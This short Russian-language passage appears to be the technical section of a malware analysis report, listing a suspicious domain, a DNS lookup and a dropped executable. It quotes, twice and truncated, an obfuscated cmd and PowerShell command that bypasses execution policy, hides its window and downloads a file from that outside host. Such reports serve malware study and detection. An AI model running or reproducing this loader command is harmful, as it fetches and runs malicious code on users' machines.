Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoW^erS^hel^l.eXe -e^X^Ec^U^TION^po^Li^cY By^pa^S^s ^-nOP^Ro^fI^L^E^ ^-w^in^do^w^s^tyLE ^hIdDen^ (^nEW^-oB^JE^CT sYSteM^.NEt.^webc^lie^N^T)^.D^OW^NLO^ad^FiL^e('http://mondayhelth...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "PoW^erS^hel^l.eXe -e^X^Ec^U^TION^po^Li^cY By^pa^S^s ^-nOP^Ro^fI^L^E^ ^-w^in^do^w^s^tyLE ^hIdDen^ (^nEW^-oB^JE^CT sYSteM^.NEt.^webc^lie^N^T)^.D^OW^NLO^ad^FiL^e('http://mondayhelth...' (со скрытым окном)